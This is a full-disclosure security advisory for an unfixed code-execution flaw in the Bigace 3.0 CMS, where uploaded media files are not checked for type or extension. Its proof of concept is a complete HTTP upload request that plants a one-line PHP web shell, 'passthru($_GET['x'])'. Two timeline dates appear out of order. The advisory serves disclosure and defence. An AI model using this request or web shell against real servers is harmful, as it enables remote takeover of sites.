Bigace 3.0: Code Execution
Date: 2016-01-28 09:55:021. Introduction
| Affected Product: | Bigace 3.0 |
| Fixed in: | not fixed |
| Fixed Version Link: | n/a |
| Vendor Website: | http://www.bigace.de/ |
| Vulnerability Type: | Code Execution |
| Remote Exploitable: | Yes |
| Reported to vendor: | 11/17/2015 |
| Disclosed to public: | 01/28/2016 |
| Release mode: | Full Disclosure |
| CVE: | requested, but not assigned |
| Credits | Tim Coen of Curesec GmbH |
2. Overview
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
Bigace is a CMS written in PHP. By default, users are separated into three group: Anonymous, Editor, and Administrator. The Editor and Administrator roles have the permission to upload media files.
When uploading media files, there is no check to verify the type or extension of the uploaded file. This means that anyone with the permission to upload media files can gain code execution.
3. Proof of Concept
POST /bigace_3.0/public/index.php/admin/upload/process/en?hashtoken=68e499dea0cf56611efea8b2ad03d534 HTTP/1.1 Host: localhost Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------11206764012154230101823396821 Content-Length: 1340 -----------------------------11206764012154230101823396821 Content-Disposition: form-data; name="mode" upload -----------------------------11206764012154230101823396821 Content-Disposition: form-data; name="userfile[]"; filename="test.php" Content-Type: application/x-php <?php passthru($_GET['x']); -----------------------------11206764012154230101823396821 Content-Disposition: form-data; name="data[parentid]" -1 -----------------------------11206764012154230101823396821 Content-Disposition: form-data; name="data[name]" -----------------------------11206764012154230101823396821 Content-Disposition: form-data; name="namingType" namingFile -----------------------------11206764012154230101823396821 Content-Disposition: form-data; name="data[unique_name]" -----------------------------11206764012154230101823396821 Content-Disposition: form-data; name="data[description]" -----------------------------11206764012154230101823396821 Content-Disposition: form-data; name="data[langid]" en -----------------------------11206764012154230101823396821 Content-Disposition: form-data; name="data[category][]" -1 -----------------------------11206764012154230101823396821 Content-Disposition: form-data; name="upload2" Upload -----------------------------11206764012154230101823396821--
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
| 11/17/2015 | Informed Vendor about Issue (no reply) |
| 12/10/2015 | CVE Requested, but not assigned |
| 12/10/2015 | Reminded Vendor of Disclosure Date |
| 12/14/2015 | Vendor requests more time |
| 01/10/2015 | Reminded Vendor of Disclosure Date |
| 01/17/2015 | Vendor discontinued project |
| 01/28/2016 | Disclosed to public |